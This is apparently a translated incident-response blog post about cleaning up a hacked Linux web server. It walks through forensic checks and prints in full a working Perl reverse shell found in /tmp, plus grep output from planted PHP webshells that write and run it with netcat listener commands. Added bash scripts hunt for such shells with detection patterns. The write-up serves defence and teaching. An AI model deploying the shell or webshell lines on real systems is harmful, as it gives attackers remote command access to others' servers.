A server is suspected of being infected with a Trojan. Searching for the site on Baidu shows that most of the indexed results are pornographic pages.
Logged on to the server immediately (in the middle of the night) and went through the following steps:
1. Check the system accounts for anything abnormal, for example an account that impersonates a system account by changing a single letter. Some attackers are clever enough to create an account named "...", which is extremely easy to overlook.
2. Check the IP addresses of recently logged-in users with last. Reviewed the entries from September 1 to the present and confirmed that a suspicious IP address appears among them.
3. Check the system initialization file /etc/inittab. The run level is 3 and nothing abnormal was found here. Some attackers like to start from this file, adding a respawn entry so that their program is automatically restarted every time it is killed, stubbornly surviving the administrator's kill.
4. Check the scripts in the run-level directory, e.g. ls -al /etc/rc3.d. Nothing abnormal found.
5. Check the scheduled tasks with crontab -l, for both the root user and the web server user www. Nothing abnormal found.
6. Check the shell history (history) and find that sendmail was installed. Asked the customer whether this was their doing; answer: not installed by them.
7. Check the web directory and find that its permissions are 777. That gives the investigation a lead: I guess this is the entry point.
8. Check /tmp and find a file that does not look right, named spider_bc. Opening it shows a Perl script with the following content:
[root@localhost mysql]# more /tmp/spider_bc
#!/usr/bin/perl
# Back-connect (reverse) shell; invoked as: spider_bc <attacker-ip> <port>
use Socket;
$cmd = "lynx";
# What the attacker receives: a banner (uname -a, id) followed by an interactive /bin/sh
$system = 'echo "`uname -a`";echo "`id`";/bin/sh';
# Rewrite argv[0] so the process shows up in ps as the "lynx" text browser
$0 = $cmd;
$target = $ARGV[0];
$port = $ARGV[1];
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
# Outbound connection to the attacker's listener (nc -l -n -v -p <port>),
# so inbound firewall rules do not stop it
connect(SOCKET, $paddr) || die("Error: $!\n");
# Attach the shell's stdin/stdout/stderr to the socket
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
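The checks in steps 1 to 8 as a reusable script, plus a check for the process-name trick in the script above: because spider_bc sets $0 to "lynx", ps shows a browser, but /proc/<pid>/exe still resolves to perl. This is an added example written for this page, not the author's own commands. It assumes a Red Hat style layout (system accounts have uid < 500, /etc/inittab exists), takes its inputs as arguments so it can be run against the live host or a copied image, and the passwd, inittab and /proc contents used to exercise it are constructed, not taken from this incident.

```shell
#!/bin/bash
# Host triage helpers for steps 1, 3 and 8 above. Added example; not the
# author's script. Every function takes its input as an argument so it can be
# run against the live host (/etc/passwd, /etc/inittab, /proc) or a copy.
# Assumptions: Red Hat style layout, system accounts have uid < 500.

# Step 1: accounts that deserve a second look:
#   uid0:     a uid 0 entry that is not "root" (a second root account)
#   badname:  a name outside [a-z0-9_-], such as "..." or a name with spaces
#   sysshell: a low-uid (system) account that nevertheless has a login shell
odd_accounts() {
    local passwd="$1"
    awk -F: '
        /^[ \t]*#/ || NF < 7                        { next }
        $3 == 0 && $1 != "root"                     { print "uid0:" $1; next }
        $1 !~ /^[a-z_][a-z0-9_-]*$/                 { print "badname:" $1; next }
        $3 < 500 && $1 != "root" && $7 ~ /sh$/      { print "sysshell:" $1 }
    ' "$passwd"
}

# Step 3: inittab "respawn" entries that are not virtual-console gettys.
# An attacker adds one so init restarts the program every time it is killed.
# Format is id:runlevels:action:process; review anything printed by hand
# (on RHEL the X display manager, prefdm, is a legitimate respawn entry).
respawn_entries() {
    local inittab="$1"
    awk -F: '
        /^[ \t]*#/ || NF < 4              { next }
        $3 == "respawn" && $4 !~ /getty/  { print }
    ' "$inittab"
}

# Step 8 follow-up: spider_bc sets $0 to "lynx", so ps shows a browser.
# /proc/<pid>/exe still resolves to the real binary (perl here). List every
# process whose argv[0] basename differs from its executable's basename.
# Expect some legitimate noise (daemons that rewrite their title); a "lynx"
# or "httpd" that resolves to /usr/bin/perl is what you are looking for.
masqueraded_procs() {
    local proc_root="${1:-/proc}" d pid exe argv0
    for d in "$proc_root"/[0-9]*; do
        [ -d "$d" ] || continue
        pid="${d##*/}"
        exe="$(readlink "$d/exe" 2>/dev/null)" || continue   # kernel threads have no exe
        exe="${exe% \(deleted\)}"
        argv0="$(tr '\0' '\n' < "$d/cmdline" 2>/dev/null | head -n 1)"
        argv0="${argv0#-}"                                     # login shells show as "-bash"
        [ -n "$argv0" ] || continue
        if [ "${argv0##*/}" != "${exe##*/}" ]; then
            printf '%s %s -> %s\n' "$pid" "$argv0" "$exe"
        fi
    done
}

# Steps 2, 4, 5 and 6 are one-liners on the live host:
#   last | head -50                     recent logins and their source addresses
#   ls -al /etc/rc3.d                   start scripts for the running level
#   crontab -l -u root; crontab -l -u www
#   history                             what was typed as root (e.g. the sendmail install)

# Run the file-based checks against the live host with: ./triage.sh --live
if [ "${1:-}" = "--live" ]; then
    echo "== accounts";  odd_accounts /etc/passwd
    echo "== inittab";   [ -f /etc/inittab ] && respawn_entries /etc/inittab
    echo "== processes"; masqueraded_procs /proc
fi
```

Pair masqueraded_procs with netstat -anp: a "lynx" process holding an ESTABLISHED outbound TCP connection to an unfamiliar address is the running back-connect shell, and its remote end is the attacker's listener.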
According to the customer's developers, the file reappears automatically after it is deleted.
9. The script is a back-connect shell: given an IP address and port on the command line it connects out to the attacker, attaches stdin, stdout and stderr to the socket and hands over /bin/sh, while setting $0 to "lynx" disguises the process in ps. The initial suspicion is therefore that an attacker used the web directory permissions and an application vulnerability to upload a program that regenerates this file. Go to the website root and run grep -r "spider" *; after a moment the results appear. The relevant part is recorded below:
[root@localhost www]# grep spider_bc * -r
plusbak/viev.php:echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'Created /tmp/spider_bc successfully<br>' : 'Failed to create /tmp/spider_bc<br>';
plusbak/viev.php:echo Exec_Run($perlpath.'/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
plusbak/viev.php:echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'Created /tmp/spider_bc.c successfully<br>' : 'Failed to create /tmp/spider_bc.c<br>';
plusbak/viev.php:@unlink('/tmp/spider_bc.c');
plusbak/viev.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
developers/FCKeditor/editor/skins/images.php:echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'Created /tmp/spider_bc successfully<br>' : 'Failed to create /tmp/spider_bc<br>';
developers/FCKeditor/editor/skins/images.php:echo Exec_Run($perlpath.'/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
developers/FCKeditor/editor/skins/images.php:echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'Created /tmp/spider_bc.c successfully<br>' : 'Failed to create /tmp/spider_bc.c<br>';
developers/FCKeditor/editor/skins/images.php:@unlink('/tmp/spider_bc.c');
developers/FCKeditor/editor/skins/images.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
developers/cache/default/index_sql.php:echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'Created /tmp/spider_bc successfully<br>' : 'Failed to create /tmp/spider_bc<br>';
developers/cache/default/index_sql.php:echo Exec_Run($perlpath.'/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
developers/cache/default/index_sql.php:echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'Created /tmp/spider_bc.c successfully<br>' : 'Failed to create /tmp/spider_bc.c<br>';
developers/cache/default/index_sql.php:@unlink('/tmp/spider_bc.c');
developers/cache/default/index_sql.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'Command execution failed';
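The grep above hunted for one known file name. The sweep below generalises it: it looks for the markers visible in this output ($_POST['yourip'], the /tmp/spider_bc drop path) and for the generic decode-then-execute construction PHP shells share, and it also reports the world-writable directories and recently modified files that the 777 web directory made possible. This is an added example, not the author's command; it assumes GNU grep and find, and the web root it is exercised on in the test is constructed, not the customer's site.

```shell
#!/bin/bash
# Sweep of a web root for the back-connect shell seen in the grep above.
# Added example, not the author's command. Argument: the web root.
# Assumes GNU grep/find. Sample files used to exercise it are constructed.

# Markers: the exact strings from the incident ($_POST['yourip'], the
# /tmp/spider_bc drop path) plus the generic decode-then-execute pattern
# common to PHP shells, e.g. eval(base64_decode($c)).
SHELL_PATTERNS='\$_POST\[.yourip.\]|/tmp/spider_bc|(eval|assert|system|passthru|shell_exec|exec|popen)[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)[[:space:]]*\('

# Files under the root that match any marker. Pass the root as a full path
# so the reported paths can be handed over unambiguously.
find_webshells() {
    grep -rElI --include='*.php' --include='*.phtml' --include='*.inc' \
        -e "$SHELL_PATTERNS" "$1" 2>/dev/null | LC_ALL=C sort
}

# Directories anyone can write to. A 777 web directory is what allowed the
# shell to be dropped in the first place.
world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null | LC_ALL=C sort
}

# Files modified in the last N days (default 7). Copies of the same shell
# usually share an mtime window, which helps find ones the grep missed.
recent_files() {
    find "$1" -type f -mtime "-${2:-7}" 2>/dev/null | LC_ALL=C sort
}

# Usage on the live site: ./sweep.sh --root /var/www/html
if [ "${1:-}" = "--root" ] && [ -n "${2:-}" ]; then
    echo "== files matching shell markers";  find_webshells "$2"
    echo "== world-writable directories";    world_writable_dirs "$2"
    echo "== files modified in last 7 days"; recent_files "$2" 7
fi
```

The grep output above already shows three identical copies of the shell (under plusbak, under FCKeditor's skins directory and under a cache directory). Cleanup has to remove all of them, kill the running perl process and only then delete /tmp/spider_bc; deleting the /tmp file alone is pointless because each copy's File_Write recreates it on the attacker's next request.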
10. The problem is basically identified. The parties are informed: service will be restored first, and the fight resumes tomorrow.
Author "sery"